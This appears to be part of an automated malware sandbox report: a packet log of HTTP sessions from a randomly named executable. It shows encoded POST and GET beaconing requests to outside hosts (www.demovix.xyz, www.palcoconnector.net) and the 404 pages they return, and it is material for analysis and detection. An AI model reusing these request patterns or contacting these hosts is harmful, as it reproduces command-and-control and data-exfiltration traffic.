                                                                                                                                                                                                              Data Ascii: ,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round
                                                                                                                                                                                                              Oct 8, 2024 15:35:10.244123936 CEST1236INData Raw: 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34
                                                                                                                                                                                                              Data Ascii: 7,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620"


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              23192.168.2.960838199.192.19.19801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.148328066 CEST1765OUTPOST /azuc/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.demovix.xyz
                                                                                                                                                                                                              Origin: http://www.demovix.xyz
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.demovix.xyz/azuc/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 46 47 75 55 66 75 67 39 59 79 56 51 36 72 38 56 52 61 69 78 47 72 49 62 43 71 5a 51 4c 2f 52 6a 43 48 48 49 66 54 48 4f 77 6a 50 4f 56 48 32 32 51 61 4f 35 52 51 6e 4d 41 38 55 62 4c 2b 50 34 51 79 65 61 31 59 78 36 63 6c 64 4b 30 48 69 49 59 37 6f 67 2f 51 78 2b 32 67 70 48 47 47 30 56 35 66 35 58 48 43 72 77 6d 38 6f 36 77 68 78 35 75 32 6b 6b 61 72 7a 61 73 66 45 45 38 74 52 5a 57 67 64 7a 4e 35 4d 38 47 75 31 47 35 2b 72 74 4b 6c 78 6c 38 70 30 61 47 6b 71 66 69 39 70 2f 6f 36 68 53 44 34 43 75 44 37 6e 4e 6a 69 72 34 31 6a 75 62 6e 48 76 7a 47 52 63 38 37 7a 2f 4b 7a 4f 35 59 52 5a 66 2f 6e 78 44 61 74 76 56 72 6c 4f 49 36 55 4c 35 38 6a 67 49 72 56 78 59 5a 6c 6c 77 47 5a 30 53 50 7a 62 56 38 42 4b 4c 7a 37 79 67 51 7a 71 6c 30 74 43 54 47 73 38 79 4c 4d 38 6d 69 48 79 56 57 76 53 6f 77 48 38 73 65 4b 6b 61 78 79 73 73 74 2b 66 78 63 6d 54 72 30 30 78 39 42 6e 58 34 50 2f 2f 39 34 58 2b 63 6c 2f 62 68 6b 74 77 62 39 45 2f 68 54 42 2b 6b 50 56 43 76 57 67 49 43 46 4f 6e 47 50 53 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=FGuUfug9YyVQ6r8VRaixGrIbCqZQL/RjCHHIfTHOwjPOVH22QaO5RQnMA8UbL+P4Qyea1Yx6cldK0HiIY7og/Qx+2gpHGG0V5f5XHCrwm8o6whx5u2kkarzasfEE8tRZWgdzN5M8Gu1G5+rtKlxl8p0aGkqfi9p/o6hSD4CuD7nNjir41jubnHvzGRc87z/KzO5YRZf/nxDatvVrlOI6UL58jgIrVxYZllwGZ0SPzbV8BKLz7ygQzql0tCTGs8yLM8miHyVWvSowH8seKkaxysst+fxcmTr00x9BnX4P//94X+cl/bhktwb9E/hTB+kPVCvWgICFOnGPSsXb3FMHV1oqBC8KvLosmZMVBwygGykyI2J9RjlbwKJwVEt3jXx6LfRGq82MsON1LrL2TA32IGoluylYJv+uYFtu8mKyZY93MXyGXKRplCnILGOcJagRnhVsbfMAzcrxeM59K9XozHyF4LUcvlf8zYajmQrAzA1tDEOUD2EeMybjVXIKbS4oT72AgszKofuM5voizabU5gxpx42QcnaQ6nABWkJZaHk4AZpA536x6p/0lG7QYHr68ugxH/MaZRj28AlPOLtSc4rNtAHLeJzIDPieAXJX2lxWpLWD1Rff34HaIwLko5m4muo1foxOgg4jw9R3qUxhtl8Eb/Br8Hi6Spm5pq6LsPbIJo7hgaFpsnbm0vxSKz6WCqmHx/dTAJK2S5GSL2yCLOsm9uBXofuanC8bw+NauF0FtBnA+W3KALVOc89WNbot0Aw5mahMwmzd3KGDr2KrfR0IHP3Dxm3SaQslTmnjlEIWT5jc6nYkaSA/6r/Lm146+mzELd+FsrYvZ/ayCzojWmhL4jNn+oe8HmMkH0SfrkZ2gvJ9qmXTUil4hJgyUoSv5XLh0wGItJqgjeKwXTLVhXT+zoRzwyqDXKSWF8eT+qwbJ+IPodnUhoXfvUQgFpPki5n/oLiR55ucuUIBAkjvoEZsZbPJ6ylAWtssRW9mpbKwPP/ [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.826778889 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:35:12 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              Content-Length: 16026
                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.826798916 CEST1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                                                                                                                                                              Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.826811075 CEST1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                                                                                                                                                              Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.826915026 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                                                                                                                                                              Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.826931000 CEST896INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                                                                                                                                                              Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.826945066 CEST1236INData Raw: 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c
                                                                                                                                                                                                              Data Ascii: 295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.826956987 CEST1236INData Raw: 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: 4.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.827085972 CEST448INData Raw: 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22
                                                                                                                                                                                                              Data Ascii: stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.827245951 CEST1236INData Raw: 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22
                                                                                                                                                                                                              Data Ascii: " cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.5
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.827416897 CEST1236INData Raw: 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33
                                                                                                                                                                                                              Data Ascii: ,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.832540035 CEST1236INData Raw: 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34
                                                                                                                                                                                                              Data Ascii: 7,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620"


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              24192.168.2.960839199.192.19.19801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:14.689215899 CEST472OUTGET /azuc/?WX=rnWllP5PLlhLLtj&tpTd=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRzC5BhxJ3N2wZ76F+LQzPhJ8EwwRHzQ== HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.demovix.xyz
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.288995981 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:35:15 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              Content-Length: 16026
                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289017916 CEST1236INData Raw: 31 2d 34 2e 36 36 38 2c 38 2e 34 32 31 2d 39 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e
                                                                                                                                                                                                              Data Ascii: 1-4.668,8.421-9.196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289030075 CEST1236INData Raw: 38 35 2d 35 2e 35 35 35 2c 31 34 31 2e 30 38 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                              Data Ascii: 85-5.555,141.085-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,12
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289057016 CEST1236INData Raw: 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22
                                                                                                                                                                                                              Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <li
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289068937 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289079905 CEST1236INData Raw: 3d 22 32 33 35 2e 33 38 37 22 20 79 32 3d 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: ="235.387" y2="295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032"
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289093018 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                                                                                                                                                              Data Ascii: x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-mite
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289103985 CEST448INData Raw: 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78
                                                                                                                                                                                                              Data Ascii: troke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289494038 CEST1236INData Raw: 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c
                                                                                                                                                                                                              Data Ascii: e fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.289736032 CEST1236INData Raw: 33 2d 31 39 2e 32 32 31 6c 35 32 2e 33 34 39 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43
                                                                                                                                                                                                              Data Ascii: 3-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke
                                                                                                                                                                                                              Oct 8, 2024 15:35:15.294135094 CEST1236INData Raw: 2e 38 32 39 2c 31 37 2e 33 33 2d 35 2e 37 36 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35
                                                                                                                                                                                                              Data Ascii: .829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" s


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              25192.168.2.960840208.91.197.27801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.766876936 CEST749OUTPOST /bnrz/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.palcoconnector.net
                                                                                                                                                                                                              Origin: http://www.palcoconnector.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.palcoconnector.net/bnrz/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 44 53 5a 51 77 74 75 50 74 4c 35 6a 52 4c 6f 48 44 70 41 51 4c 72 6f 69 6f 78 76 50 68 70 41 39 61 4b 34 48 6a 31 35 51 51 4a 6e 51 4a 46 77 32 31 7a 4a 51 33 64 4e 62 61 4b 32 6a 70 57 39 7a 36 45 51 36 31 30 31 35 6a 52 70 58 77 7a 71 34 69 4e 73 74 6a 50 41 57 6d 66 4a 47 69 41 2b 6c 2b 33 4b 79 39 55 47 62 46 2b 6c 71 2f 49 65 77 6b 48 6e 65 5a 50 6e 41 31 61 37 5a 78 4e 6b 31 38 63 51 42 73 47 4e 45 49 45 6d 48 76 77 32 55 36 61 37 69 54 4e 34 78 72 44 44 31 57 51 32 35 6c 6f 35 4d 46 59 2f 73 38 46 4f 61 48 2f 41 63 34 66 79 41 53 78 48 2f 65 35 41 34
                                                                                                                                                                                                              Data Ascii: tpTd=DSZQwtuPtL5jRLoHDpAQLroioxvPhpA9aK4Hj15QQJnQJFw21zJQ3dNbaK2jpW9z6EQ61015jRpXwzq4iNstjPAWmfJGiA+l+3Ky9UGbF+lq/IewkHneZPnA1a7ZxNk18cQBsGNEIEmHvw2U6a7iTN4xrDD1WQ25lo5MFY/s8FOaH/Ac4fyASxH/e5A4


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
